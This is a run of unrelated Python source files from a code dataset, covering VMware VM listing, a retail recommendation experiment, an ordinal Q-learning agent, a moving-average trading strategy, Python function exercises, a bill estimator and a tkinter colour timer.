oslo_vutil, \"get_object_property\", folder_ref, \"name\")\n\n folder_name = folder_ref_name[folder_ref]\n\n # Ignoring the orphaned or inaccessible VMs\n # Ignoring templates\n # Ignoring VMs from other datastores\n if conn_state in ['orphaned', 'inaccessible']:\n LOG.warn('Ignoring VM [{0}] with connection state '\n '[{1}]'.format(uuid, conn_state))\n continue\n if driver._datastore_regex and \\\n not driver._datastore_regex.match(datastore):\n continue\n\n if folder_name in folders_to_ignore:\n # Ignore VMs in folders that are specified \"ignore_folders\"\n # in nova.conf\n LOG.info('Ignoring VM {name} as per config'.format(name=vm_name))\n continue\n\n if vm_path[-4:] == 'vmtx':\n _vm_cache[uuid] = vm.obj\n yield vm\n else:\n if resource_pool and resource_pool in res_pools_to_look_for:\n _vm_cache[uuid] = vm.obj\n yield vm\n\n\ndef list_instance_uuids_on_vcenter(driver, node=None, template_uuids=None):\n \"\"\"\n All list functions need to call the vsphere APIs since the information\n returned by list functions should always be in sync with hypervisor.\n local cache will be refreshed in this call.\n Note: Parameter template_uuids if not None, will be populated with the\n template UUIDs returned by vcenter. 
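(e.g. call with template_uuids=[] and inspect the list after the call).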
If None, templates will be skipped.\n \"\"\"\n global _vm_cache\n global _last_cache_clear_time\n global _cache_refresh_interval\n current_time = datetime.now()\n if _last_cache_clear_time is None \\\n or current_time - _last_cache_clear_time >= _cache_refresh_interval:\n # to prevent subsequent calls for VMs on multiple nodes from\n # clearing the cache\n _vm_cache.clear()\n _last_cache_clear_time = datetime.now()\n uuid_list = []\n for vm in get_vms_on_vcenter(driver, node):\n uuid = None\n path = None\n for prop in vm.propSet:\n if prop.name == \"summary.config.instanceUuid\":\n uuid = prop.val\n elif prop.name == \"summary.config.vmPathName\":\n path = prop.val\n if uuid and path:\n break\n if path[-4:] == 'vmtx':\n if template_uuids is not None:\n template_uuids.append(uuid)\n else:\n uuid_list.append(uuid)\n return uuid_list\n\n\ndef _get_res_pools_for_cluster(driver, cluster_name):\n \"\"\"\n Gets all the resource pools belonging to the given cluster\n \"\"\"\n res_pools = []\n res_pool_objects = driver._session._call_method(vim_util, \"get_objects\",\n \"ResourcePool\", ['owner'])\n\n for res_pool_obj in res_pool_objects.objects:\n for prop in res_pool_obj.propSet:\n if prop.name == 'owner' and prop.val.value in cluster_name:\n res_pools.append(res_pool_obj.obj)\n\n return res_pools\n\n\ndef _get_datastores_for_cluster(driver, cluster_mor, datastore_regex):\n \"\"\"\n Gets all the datastores associated with the given custer that match\n the datastore regex\n \"\"\"\n datastore_ret = driver._session._call_method(\n oslo_vutil, \"get_object_property\", cluster_mor, \"datastore\")\n if not datastore_ret:\n return []\n data_stores = driver._session._call_method(\n vim_util, \"get_properties_for_a_collection_of_objects\",\n \"Datastore\", datastore_ret.ManagedObjectReference,\n [\"summary.name\"])\n\n data_store_refs = []\n for obj_content in data_stores.objects:\n propdict = vm_util.propset_dict(obj_content.propSet)\n if datastore_regex is None or \\\n datastore_regex.match(propdict['summary.name']):\n data_store_refs.append(obj_content.obj)\n\n return data_store_refs\n\n\ndef _get_vms_and_uuids(driver):\n \"\"\"\n Get the VM object reference along with name and UUID for all the VMs\n associated with given connection object(driver)\n \"\"\"\n return driver._session._call_method(\n vim_util, \"get_objects\", \"VirtualMachine\",\n [\"name\", \"summary.config.instanceUuid\"])\n","sub_path":"virt/vmwareapi/vm_utils_pf9.py","file_name":"vm_utils_pf9.py","file_ext":"py","file_size_in_byte":18019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"440807482","text":"import pandas as pd\nfrom mlxtend.frequent_patterns import apriori\nfrom mlxtend.frequent_patterns import association_rules\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport math\nimport re\n\ndata_path = \"E:\\Projects\\MBA_retail\\\\tmp\"\nN_clusters = 4\n\ndef get_train_data():\n data_path_train = 'E:\\Data\\kaggle'\n prior = pd.read_csv('{0}/order_products__train.csv'.format(data_path_train))\n products = pd.read_csv('{0}/products.csv'.format(data_path_train))\n aisles = pd.read_csv('{0}/aisles.csv'.format(data_path_train))\n orders = pd.read_csv('{0}/orders.csv'.format(data_path_train))\n mt = pd.merge(prior, products, on=['product_id', 'product_id'])\n mt = pd.merge(mt, aisles, on=['aisle_id', 'aisle_id'])\n mt = pd.merge(mt, orders, on=['order_id', 'order_id'])\n\n mt_sort = mt['aisle'].value_counts()\n print(mt_sort.head())\n\n cust_prod = 
pd.crosstab(mt['order_id'], mt['aisle']) # user_id\n return cust_prod\n\ndef get_clients():\n data_path_train = 'E:\\Data\\kaggle'\n prior = pd.read_csv('{0}/order_products__prior.csv'.format(data_path_train))\n prior = prior[:50000]\n products = pd.read_csv('{0}/products.csv'.format(data_path_train))\n aisles = pd.read_csv('{0}/aisles.csv'.format(data_path_train))\n orders = pd.read_csv('{0}/orders.csv'.format(data_path_train))\n mt = pd.merge(prior, products, on=['product_id', 'product_id'])\n mt = pd.merge(mt, aisles, on=['aisle_id', 'aisle_id'])\n mt = pd.merge(mt, orders, on=['order_id', 'order_id'])\n\n mt_sort = mt['aisle'].value_counts()\n\n cust_prod = pd.crosstab(mt['order_id'], mt['aisle']) # user_id\n\n data_lbl = mt[['aisle_id', 'aisle']]\n\n df1 = mt[['order_id', 'aisle', 'aisle_id']]\n df1 = df1.sort_values(by=['order_id'])\n df = df1.as_matrix()\n\n N = len(cust_prod)\n clients_aisle = []\n clients_aisle_id = []\n tmp_array = [df[0][1]]\n tmp_array_id = [df[0][2]]\n\n for i in range(1, N):\n if (df[i][0] == df[i - 1][0]):\n tmp_array.append(df[i][1])\n tmp_array_id.append(df[i][2])\n\n else:\n clients_aisle.append(tmp_array)\n clients_aisle_id.append(tmp_array_id)\n\n tmp_array = [df[i][1]]\n tmp_array_id = [df[i][2]]\n\n print('clients - ok')\n return clients_aisle, clients_aisle_id, data_lbl, cust_prod\n\ndef matrix_cosine(file_path):\n\n data = pd.read_csv(file_path)\n data_matrix = data.as_matrix()\n\n N = len(data_matrix[0])\n\n Matrix_cos = [[0 for x in range(N)] for y in range(N)]\n for i in range(N):\n for j in range(i, N):\n i_i = data_matrix[:, i]\n j_j = data_matrix[:, j]\n cosine = distCosine(i_i, j_j)\n Matrix_cos[i][j] = cosine\n Matrix_cos[j][i] = cosine\n return Matrix_cos\n\ndef get_products(clients, rules, flag):\n # flag = 0: return list of recommendation\n # flag = 1: return confidence\n # flag = 2: return item\n buy = []\n x_data = rules['antecedants'].tolist()\n x_data = [list(_x) for _x in x_data]\n y_data = rules['consequents'].tolist()\n y_data = [list(_y) for _y in y_data]\n N = len(rules)\n recommendation_full = []\n recommendation = []\n prob = []\n for rule in x_data:\n\n if np.array_equal(rule, clients):\n add = y_data[x_data.index(rule)]\n if add not in recommendation_full:\n recommendation_full.append(y_data[x_data.index(rule)])\n\n check = set(rule).issubset(set(clients))\n if (check):\n add = list(set(y_data[x_data.index(rule)]) - set(clients))\n if add != []:\n recommendation.append(add)\n prob.append(rules['confidence'][x_data.index(rule)])\n\n col_names = ['item', 'confidence']\n rec = pd.DataFrame(columns=col_names)\n for i in range(len(prob)):\n rec = rec.append({'item': recommendation[i], 'confidence': prob[i]}, ignore_index=True)\n rec = rec.sort_values(by=['confidence'], ascending=False)\n rec = rec.as_matrix()\n\n selected = []\n selected_2 = 0\n\n if recommendation_full != []:\n selected = recommendation_full\n else:\n if recommendation != []: # !!!!MAX\n # probs = np.array(prob)\n # probs = normalize(probs.reshape(1,-1), 'l1')[0]\n # selected_idx = np.random.choice(len(recommendation), 1, False, probs)[0]\n selected = rec[0][0] # recommendation[selected_idx]\n selected_2 = rec[0][1] # prob[selected_idx]\n\n # if random.random() < probs[selected_idx]:\n # print('!!!!!!!%%%!! 
',selected)\n # buy.append(selected)\n recommendation = [item for sublist in recommendation for item in sublist]\n recommendation = list(set(recommendation))\n # recommendation = list((set(recommendation) - set(clients)))\n\n if (flag == 0):\n return recommendation\n if (flag == 1):\n return selected_2\n if (flag == 2):\n return selected\n\n\ndef distCosine(vecA, vecB):\n def dotProduct(vecA, vecB):\n d = np.multiply(vecA, vecB).sum()\n return d\n\n a = dotProduct(vecA, vecB)\n b = math.sqrt(dotProduct(vecA, vecA))\n c = math.sqrt(dotProduct(vecB, vecB))\n if (b == 0 or c == 0):\n return 0\n else:\n return a / b / c\n\n\ndef get_recommendation_cos(Matrix_cos, client, df_lbl):\n recommendation = []\n\n for i in client:\n a = list(Matrix_cos[i])\n m = -1\n for t in a:\n if t > m and t < 1.0:\n m = t\n r = a.index(m)\n # print(i, '->',r)\n if (r != 0):\n y = df_lbl.set_index(['aisle_id'])\n y = y.loc[r]\n y = y.as_matrix()\n recommendation.append(y[0][0])\n # print(y[0][0])\n # else:\n # recommendation.append('No Recommendation')\n # print('No Recommendation')\n return recommendation\n\n\ndef get_recommendation(client, recommendations, x_data, y_data, c_dat):\n col_names = ['antecedants', 'consequents', 'confidence']\n recommendation_rules = pd.DataFrame(columns=col_names)\n '''''''''''\n x_data = rules['antecedants'].tolist()\n x_data = [list(_x) for _x in x_data]\n\n y_data = rules['consequents'].tolist()\n y_data = [list(_y) for _y in y_data]\n c_data = rules['confidence'].tolist()\n '''\n N = len(x_data)\n for r in range(N):\n ch = list(set(client) & set(x_data[r]))\n ch2 = list(set(recommendations) & set(y_data[r]))\n if (ch != [] and ch2 != []):\n recommendation_rules = recommendation_rules.append(\n {'antecedants': x_data[r], 'consequents': y_data[r], 'confidence': c_data[r]}, ignore_index=True)\n # print(recommendation_rules.head())\n result_confidence = get_products(client, recommendation_rules, 1)\n return result_confidence\n\ndef parse_rules(rules, type):\n x_data = rules[type]\n x_data_r = []\n for x in x_data:\n x_d = x[10:len(x) - 1]\n x_d = re.sub(\"[{})(]\", \"\", x_d)\n t_ = ''\n for st in range(len(x_d)):\n if x_d[st] != \"'\" and x_d[st - 1] != ',':\n t_ += x_d[st]\n x_d = t_.split(',')\n x_data_r.append(x_d)\n return x_data_r\nif __name__ == \"__main__\":\n data_path = \"E:\\Projects\\MBA_retail\\\\tmp\"\n\n clients_aisle, clients_aisle_id, data_lbl, clients_matrix = get_clients()\n print(clients_aisle)\n print(clients_aisle_id)\n print(data_lbl)\n print('rules_start')\n rules_cluster_1 = pd.read_csv('{0}/rules_cluster_1.csv'.format(data_path))\n if (len(rules_cluster_1)>500000):\n rules_cluster_1 = rules_cluster_1[:500000]\n x_data_1 = parse_rules(rules_cluster_1,'antecedants')\n y_data_1 = parse_rules(rules_cluster_1,'consequents')\n c_data_1 = rules_cluster_1['confidence'].tolist()\n print('cluser 1 - rules')\n\n rules_cluster_2 = pd.read_csv('{0}/rules_cluster_2.csv'.format(data_path))\n if (len(rules_cluster_2)>500000):\n rules_cluster_2 = rules_cluster_2[:500000]\n x_data_2 = parse_rules(rules_cluster_2, 'antecedants')\n y_data_2 = parse_rules(rules_cluster_2, 'consequents')\n c_data_2 = rules_cluster_2['confidence'].tolist()\n print('cluster 2 - rules')\n\n rules_cluster_3 = pd.read_csv('{0}/rules_cluster_3.csv'.format(data_path))\n if (len(rules_cluster_3)>500000):\n rules_cluster_3 = rules_cluster_3[:500000]\n x_data_3 = parse_rules(rules_cluster_3, 'antecedants')\n y_data_3 = parse_rules(rules_cluster_3, 'consequents')\n c_data_3 = 
rules_cluster_3['confidence'].tolist()\n print('cluster 3 - rules')\n\n rules_cluster_4 = pd.read_csv('{0}/rules_cluster_4.csv'.format(data_path))\n if (len(rules_cluster_4)>500000):\n rules_cluster_4 = rules_cluster_4[:500000]\n x_data_4 = parse_rules(rules_cluster_4, 'antecedants')\n y_data_4 = parse_rules(rules_cluster_4, 'consequents')\n c_data_4 = rules_cluster_4['confidence'].tolist()\n print('cluster 4 - rules')\n\n print('rules')\n\n matrix_cluster_1 = matrix_cosine('{0}/train_cluster_1.csv'.format(data_path))\n matrix_cluster_2 = matrix_cosine('{0}/train_cluster_2.csv'.format(data_path))\n matrix_cluster_3 = matrix_cosine('{0}/train_cluster_3.csv'.format(data_path))\n matrix_cluster_4 = matrix_cosine('{0}/train_cluster_4.csv'.format(data_path))\n print('matrix')\n train_data = get_train_data()\n clusterer = KMeans(n_clusters=N_clusters).fit(train_data)\n\n number_clients = 300#len(clients_aisle)\n conf = []\n c_preds = clusterer.predict(clients_matrix)\n print('prediction')\n for c in range(number_clients):\n if (c_preds[c] == 0):\n Matrix_cos = matrix_cluster_1\n x_data = x_data_1\n y_data = y_data_1\n c_data = c_data_1\n if (c_preds[c] == 1):\n Matrix_cos = matrix_cluster_2\n rules = rules_cluster_2\n x_data = x_data_2\n y_data = y_data_2\n c_data = c_data_2\n if (c_preds[c] == 2):\n Matrix_cos = matrix_cluster_3\n x_data = x_data_3\n y_data = y_data_3\n c_data = c_data_3\n if (c_preds[c] == 3):\n Matrix_cos = matrix_cluster_4\n x_data = x_data_4\n y_data = y_data_4\n c_data = c_data_4\n\n print('{0}/{1} - cluster{2} - rules = {3}'.format(c+1, number_clients, c_preds[c], len(x_data)))\n\n cos = get_recommendation_cos(Matrix_cos, clients_aisle_id[c], data_lbl)\n cos = list((set(cos) - set(clients_aisle[c])))\n print('len(cos)', len(cos))\n result = get_recommendation(clients_aisle[c], cos, x_data, y_data, c_data)\n print(result)\n conf.append(result)\n\n np.savetxt(\"tmp/confidence_clusters.csv\", conf, delimiter=\";\")","sub_path":"src/experiments/experiment_cluster_kaggle.py","file_name":"experiment_cluster_kaggle.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"615515903","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport itertools\n\n\nclass QAgent:\n def __init__(self, alpha, gamma, epsilon, epsilon_min, n_actions, n_ordinals, n_observations, randomize):\n self.alpha = alpha\n self.gamma = gamma\n self.epsilon = epsilon\n self.epsilon_min = epsilon_min\n self.n_actions = n_actions\n self.n_ordinals = n_ordinals\n self.observation_space = self.init_observation_space()\n self.observation_to_index = self.build_obs_dict(self.observation_space)\n\n # Ordinal_Values (3-dimensional array with ordinal_value (array of floats) for each action in each observation)\n self.ordinal_values = np.full((n_observations, n_actions, n_ordinals), 0.0)\n\n self.win_rates = []\n self.average_rewards = []\n\n # Defines discrete observation space\n @staticmethod\n def init_observation_space():\n cart_pos_space = np.linspace(-2.4, 2.4, 10)\n cart_vel_space = np.linspace(-4, 4, 10)\n pole_theta_space = np.linspace(-0.20943951, 0.20943951, 10)\n pole_theta_vel_space = np.linspace(-4, 4, 10)\n return [cart_pos_space, cart_vel_space, pole_theta_space, pole_theta_vel_space]\n\n @staticmethod\n def build_obs_dict(observation_space):\n # List of all possible discrete observations\n observation_range = [range(len(i) + 1) for i in observation_space]\n # Dictionary that maps 
discretized observations to array indices\n observation_to_index = {}\n index_counter = 0\n for observation in list(itertools.product(*observation_range)):\n observation_to_index[observation] = index_counter\n index_counter += 1\n return observation_to_index\n\n def update(self, prev_obs, prev_act, obs, reward, episode_reward, done):\n ordinal = self.reward_to_ordinal(reward, episode_reward, done)\n # update ordinal_values with received ordinal\n self.update_ordinal_values(prev_obs, prev_act, obs, ordinal)\n\n # Updates ordinal_values based on probability of ordinal reward occurrence for each action\n def update_ordinal_values(self, prev_obs, prev_act, obs, ordinal):\n greedy_action = self.get_greedy_action(obs)\n # reduce old data weight\n for i in range(self.n_ordinals):\n self.ordinal_values[prev_obs, prev_act, i] *= (1 - self.alpha)\n self.ordinal_values[prev_obs, prev_act, i] += self.alpha * (self.gamma * self.ordinal_values[obs, greedy_action, i])\n\n # add new data point\n self.ordinal_values[prev_obs, prev_act, ordinal] += self.alpha\n\n # Computes borda_values for one observation given the ordinal_values\n def compute_borda_scores(self, obs):\n # sum up all ordinal values per action for given observation\n ordinal_value_sum_per_action = np.zeros(self.n_actions)\n for action_a in range(self.n_actions):\n for ordinal_value in self.ordinal_values[obs, action_a]:\n ordinal_value_sum_per_action[action_a] += ordinal_value\n\n # count actions whose ordinal value sum is not zero (no comparision possible for actions without ordinal_value)\n non_zero_action_count = np.count_nonzero(ordinal_value_sum_per_action)\n actions_to_compare_count = non_zero_action_count - 1\n\n borda_scores = []\n # compute borda_values for action_a (probability that action_a wins against any other action)\n for action_a in range(self.n_actions):\n # if action has not yet recorded any ordinal values, action has to be played (set borda_value to 1.0)\n if ordinal_value_sum_per_action[action_a] == 0:\n borda_scores.append(1.0)\n continue\n\n if actions_to_compare_count < 1:\n # set lower than 1.0 (borda_value for zero_actions is 1.0)\n borda_scores.append(0.5)\n else:\n # over all actions: sum up the probabilities that action_a wins against the given action\n winning_probability_a_sum = 0\n # compare action_a to all other actions\n for action_b in range(self.n_actions):\n if action_a == action_b:\n continue\n # not comparable if action_b has no ordinal_values\n if ordinal_value_sum_per_action[action_b] == 0:\n continue\n else:\n # probability that action_a wins against action_b\n winning_probability_a = 0\n # running ordinal probability that action_b is worse than current investigated ordinal\n worse_probability_b = 0\n for ordinal_count in range(self.n_ordinals):\n ordinal_probability_a = self.ordinal_values[obs, action_a, ordinal_count] \\\n / ordinal_value_sum_per_action[action_a]\n # ordinal_probability_b is also the tie probability\n ordinal_probability_b = (self.ordinal_values[obs, action_b, ordinal_count] /\n ordinal_value_sum_per_action[action_b])\n winning_probability_a += ordinal_probability_a * \\\n (worse_probability_b + ordinal_probability_b / 2.0)\n worse_probability_b += ordinal_probability_b\n winning_probability_a_sum += winning_probability_a\n # normalize summed up probabilities with number of actions that have been compared\n borda_scores.append(winning_probability_a_sum / actions_to_compare_count)\n return borda_scores\n\n def get_greedy_action(self, obs):\n return 
np.argmax(self.compute_borda_scores(obs))\n\n # Chooses action with epsilon greedy exploration policy\n def choose_action(self, obs, greedy):\n greedy_action = self.get_greedy_action(obs)\n # choose random action with probability epsilon\n if not greedy and random.random() < self.epsilon:\n return random.randrange(self.n_actions)\n # greedy action is chosen with probability (1 - epsilon)\n else:\n return greedy_action\n\n def end_episode(self, n_episodes):\n # gradually reduce epsilon after every done episode\n self.epsilon = self.epsilon - 2 / n_episodes if self.epsilon > self.epsilon_min else self.epsilon_min\n\n def preprocess_observation(self, obs):\n discrete_observation = []\n for obs_idx in range(len(obs)):\n discrete_observation.append(int(np.digitize(obs[obs_idx], self.observation_space[obs_idx])))\n return self.observation_to_index[tuple(discrete_observation)]\n\n # Mapping of reward value to ordinal reward (has to be configured per game)\n def reward_to_ordinal(self, reward, episode_reward, done):\n if done and not self.check_win_condition(reward, episode_reward, done):\n return 0\n else:\n return 1\n\n # Returns Boolean, whether the win-condition of the environment has been met\n @staticmethod\n def check_win_condition(reward, episode_reward, done):\n if done and episode_reward == 200:\n return True\n else:\n return False\n\n def evaluate(self, i_episode, episode_rewards, episode_wins):\n # compute average episode reward and win rate over last episodes\n average_reward = round(sum(episode_rewards) / len(episode_rewards), 2)\n win_rate = round(sum(episode_wins) / len(episode_wins), 2)\n # store average episode reward and win rate over last episodes for plotting purposes\n self.average_rewards.append(average_reward)\n self.win_rates.append(win_rate)\n print(\"{}\\t{}\\t{}\".format(i_episode + 1, average_reward, win_rate))\n\n # Plots win rate and average score over all episodes\n def plot(self, n_episodes, step_size):\n # plot win rate\n plt.figure()\n plt.plot(list(range(step_size, n_episodes + step_size, step_size)), self.win_rates)\n plt.xlabel('Number of episodes')\n plt.ylabel('Win rate')\n\n # plot average score\n plt.figure()\n plt.plot(list(range(step_size, n_episodes + step_size, step_size)), self.average_rewards)\n plt.xlabel('Number of episodes')\n plt.ylabel('Average score')\n\n plt.show()\n","sub_path":"q_learning/ordinal_q_discretized_agent.py","file_name":"ordinal_q_discretized_agent.py","file_ext":"py","file_size_in_byte":8479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"415395040","text":"# -*- coding: utf-8 -*-\nfrom pyalgotrade.technical import ma\nfrom pyalgotrade.technical import cross\nimport sys,os\nimport pandas as pd\nimport time as time\nimport datetime as dt\n\nxpower = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,'Ea_00_BaseClass'))\nsys.path.append(xpower)\nfrom midBaseStrategy import midBaseStrategy as midBaseStrategy\n\n#mid graphic result output\nfrom Analyzer import Analyzer\n\n#mid money\ndataRoot = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir)) \nsys.path.append(dataRoot)\nimport Ea_02_money.moneyFixedAmount as moneyFixedAmount\nimport Ea_02_money.moneyFixedRatio as moneyFixedRatio\nimport Ea_02_money.moneyFirst as moneyFirst\nimport Ea_02_money.moneySecond as moneySecond\n \nclass DMACrossOver(midBaseStrategy):\n def __init__(self): \n self.__initDataCenter()\n self.__initEa()\n def __initEa(self):\n #mid 1)signal 控制参数\n 
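        #mid   (signal control parameters: trade-direction switches and the two SMA periods;
        #mid    per calcSignal below this yields, roughly: buy when the short SMA
        #mid    crosses above the long SMA, sell when it crosses below)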
self.InKLine = True\n self.longAllowed = True\n self.shortAllowed = True \n self.__shortPeriod = 5\n self.__longPeriod = 20 \n #mid 2)signal 计算指标图形化输出控制\n #self.toPlot = True \n self.analyzer = Analyzer(Globals=[]) \n #mid 3)money 风险策略控制\n money = \"moneyFixedRatio\"\n if(money == \"moneySecond\"):\n self.money = moneySecond.moneySecond() \n elif(money == \"moneyFixedAmount\"):\n self.money = moneyFixedAmount.moneyFixedAmount() \n elif(money == \"moneyFixedRatio\"):\n self.money = moneyFixedRatio.moneyFixedRatio() \n def __getInstrumentsEastmoneyFormat(self):\n codesStr = \"\"\"600000.SH\n 600010.SH\n 600016.SH\n 600028.SH\n 600029.SH\n 600030.SH\n 600036.SH\n 600048.SH\n 600050.SH\n 600104.SH\n 600109.SH\n 600111.SH\n 600518.SH\n 600519.SH\n 600637.SH\n 600795.SH\n 600837.SH\n 600887.SH\n 600893.SH\n 600958.SH\n 600999.SH\n 601006.SH\n 601088.SH\n 601166.SH\n 601169.SH\n 601186.SH\n 601211.SH\n 601288.SH\n 601318.SH\n 601328.SH\n 601336.SH\n 601377.SH\n 601390.SH\n 601398.SH\n 601601.SH\n 601628.SH\n 601668.SH\n 601669.SH\n 601688.SH\n 601727.SH\n 601766.SH\n 601788.SH\n 601800.SH\n 601818.SH\n 601857.SH\n 601919.SH\n 601985.SH\n 601988.SH\n 601989.SH\n 601998.SH\n \"\"\" \n return codesStr\n def __getInstrumentsTushare(self):\n #mid 1)从excel赋值粘贴获得如下数据\n codesStr = self.__getInstrumentsEastmoneyFormat()\n #mid 2)将字符串使用split()分割为list,默认会去除\\n和所有空格。\n #codeList = ['000021','000022']\n codeList = [code.split('.')[0] for code in codesStr.split()] \n return codeList \n def __getInstrumentsEastmoney(self):\n codesStr = self.__getInstrumentsEastmoneyFormat()\n #mid 2)将字符串使用split()分割为list,默认会去除\\n和所有空格。\n #codeList = ['000021.SZ','000022.SZ']\n codeList = codesStr.split()\n return codeList\n def __getBenchSymbol(self):\n return \"510050.SH\"\n def __getBenchDataProvider(self):\n return \"eastmoney\"\n def __getInstruments(self,dataSource):\n if(dataSource == \"tushare\"):\n instruments = self.__getInstrumentsTushare()\n if(dataSource == \"eastmoney\"):\n instruments = self.__getInstrumentsEastmoney()\n return instruments[0:1] \n def __initDataCenter(self):\n #mid 数据中心存取参数定义,决定当前被回测数据的储存属性,用于获取candledata,feeds \n self.period = 'D'\n self.benchSymbol = self.__getBenchSymbol()\n self.benchDataProvider = self.__getBenchDataProvider()\n selector = \"three\"\n if(selector == \"one\"):\n self.dataProvider = 'tushare'\n self.storageType = 'mongodb'\n self.instruments = ['000096','000099','600839','600449']#,'600839'] \n if(selector == \"tow\"):\n self.dataProvider = 'tushare'\n self.storageType = 'mongodb' \n #self.instruments = ['XAUUSD','EURUSD'] \n self.instruments = self.__getInstruments(self.dataProvider)\n if(selector == \"three\"):\n self.dataProvider = 'eastmoney'\n self.storageType = 'mongodb' \n #self.instruments = ['000021.SZ','000022.SZ'] #]\n self.instruments = self.__getInstruments(self.dataProvider) \n if(selector == \"four\"):\n self.dataProvider = 'mt5'\n self.storageType = 'mongodb' \n #self.instruments = ['XAUUSD','EURUSD'] \n self.instruments = ['XAGUSD','XAUUSD'] \n def initIndicators(self):\n #mid 3)\n self.__sma = {}\n self.__lma = {} \n for instrument in self.instruments:\n self.__sma[instrument] = ma.SMA(self.closePrices[instrument], self.__shortPeriod,maxLen=self.mid_DEFAULT_MAX_LEN)\n self.__lma[instrument] = ma.SMA(self.closePrices[instrument],self.__longPeriod,maxLen=self.mid_DEFAULT_MAX_LEN)\n def addIndicators(self,instrument):\n #mid 此处生成的数据仅由Analyzer消费\n short_ema = pd.DataFrame(data=list(self.__sma[instrument]),index=self.__sma[instrument].getDateTimes(),columns = 
['short_ema'])\n long_ema = pd.DataFrame(data=list(self.__lma[instrument]),index=self.__lma[instrument].getDateTimes(),columns = ['long_ema'])\n \n self.results[instrument] = self.results[instrument].join(short_ema)\n self.results[instrument] = self.results[instrument].join(long_ema)\n #self.results[instrument]['short_ema'] = e['short_ema']\n #self.results[instrument]['long_ema'] = list(self.__lma[instrument])\n def calcSignal(self):\n self.buySignal,self.sellSignal = {},{}\n for instrument in self.instruments:\n self.buySignal[instrument],self.sellSignal[instrument] = False,False\n #if(self.longAllowed):\n if self.longPosition[instrument] is None:\n #mid 无多仓,检查是否需要开多仓\n if cross.cross_above(self.__sma[instrument], self.__lma[instrument]) > 0:\n self.buySignal[instrument] = True \n #if(self.shortAllowed ):\n if self.shortPosition[instrument] is None:\n if cross.cross_below(self.__sma[instrument], self.__lma[instrument]) > 0:\n self.sellSignal[instrument] = True \n def onBars(self, bars): \n time = self.getCurrentDateTime()\n if(time == dt.datetime(2001,11,8,0,0)):\n pass \n self.calcSignal()\n self.closePosition()\n self.openPosition()\n self.recordAccount() ","sub_path":"upsea/Ea_11_Dma_pg_01/EA/Signal.py","file_name":"Signal.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"573859899","text":"# 1. return a function\ndef func1():\n def func2(x):\n return x + 1\n\n return func2\n\n\nnew_func = func1()\nfunc1()(1)\nnew_func(1)\n\n\ndef func1(x):\n def func2(x1):\n return x\n\n return func2\n\n\nprint(\"--------\")\nprint(func1(10)(20))\n\n\ndef func3(x):\n return x\n\n\ndef builder(name):\n if callable(name):\n return name\n else:\n print(\"wrong\")\n\n\n# print(builder(func3))\n\ndef sf01(a):\n return a + 1\n\n\nx = 1\ny = 2\nz = 3\nout = [*map(sf01, (x, y, z))]\nprint(out)\nx = []\nx.append([1, 2, 3])\nx.append([2, 3, 4])\nimport numpy as np\n\ny = np.concatenate(x)\nprint(y)\n\n\ndef myFun1(**kwargs):\n print(kwargs)\n for key, value in kwargs.items():\n print(\"%s == %s\" % (key, value))\n\n\nmyFun1(first='Geeks', mid='for', last='Geeks')\n\n\ndef myFun(arg1, arg2, arg3):\n print(\"arg1:\", arg1)\n print(\"arg2:\", arg2)\n print(\"arg3:\", arg3)\n\n\ndef myFun2(*arg):\n print(arg)\n\n\n# Now we can use *args or **kwargs to\n# pass arguments to this function :\nargs = (\"Geeks\", \"for\", \"Geeks\")\nmyFun(*args)\nkwargs = {\"arg1\": 2, \"arg2\": 3, \"arg3\": 4}\nmyFun1(**kwargs)\n\ntest_keys = [\"Rash\", \"Kil\", \"Varsha\"]\ntest_values = [1, 4, 5]\nres = dict(zip(test_keys, test_values))\nmyFun2(test_keys)\n\nprint(res)\n","sub_path":"src/basics/advanced_functions.py","file_name":"advanced_functions.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"602628851","text":"TARIFF_11 = 0.244618\r\nTARIFF_31 = 0.136928\r\n\r\nprint(\"Electricity bill estimator, by Luke\")\r\n\r\nkwh_price = int(input(\"Enter cents per kWh:\"))\r\ndaily_kwh = float(input(\"Enter daily use in kWh:\"))\r\nbilling_days = int(input(\"Enter number of billing days:\"))\r\nestimate_bill = kwh_price * daily_kwh * billing_days / 100\r\n\r\nprint(\"Estimated bill: $\", estimate_bill)","sub_path":"Elec bill estimate.py","file_name":"Elec bill estimate.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"366905837","text":"import 
random\nfrom time import sleep\nfrom tkinter import *\n\ncheck = {\n \"blue\": True,\n \"red\": True,\n \"yellow\": True,\n \"green\": True,\n \"black\": False,\n \"pink\": False\n}\n\ncolors = {\n \"blue\": \"0000ff\",\n \"red\": \"ff0000\",\n \"yellow\": \"00ffff\",\n \"green\": \"00ff00\",\n \"black\": \"000000\",\n \"pink\": \"f0f0f0\"\n}\n\nclr = [\"blue\", \"red\", \"yellow\", \"green\", \"black\", \"pink\"]\n\ninterval = 3.0 # amount of time until next color\ntimer = 60 # total amount of time\npause = 0.2 # pause between color switch\namount_of_colors = 4\n\nfor color in check:\n if not check.get(color):\n colors.pop(color)\n\nfor color in colors:\n print(color)\n\nprint(\"sequence\")\n\n\ndef reset():\n global colors\n global amount_of_colors\n colors = {\n \"blue\": \"0000ff\",\n \"red\": \"ff0000\",\n \"yellow\": \"00ffff\",\n \"green\": \"00ff00\",\n \"black\": \"000000\",\n \"pink\": \"f0f0f0\"\n }\n amount_of_colors = 6\n\n\ndef set_labels():\n print(interval)\n labelFreq.set(interval)\n labelTime.set(timer/60)\n labelColors.set(amount_of_colors)\n\n\ndef colorize():\n clr = random.choice(list(colors.keys()))\n print(clr)\n fill(clr)\n\n\ndef fill(bg_color):\n colour.set(bg_color)\n print\n colour.get()\n bottomFrame.configure(bg=colour.get())\n root.update()\n\n\ndef looper():\n loop = int(timer / 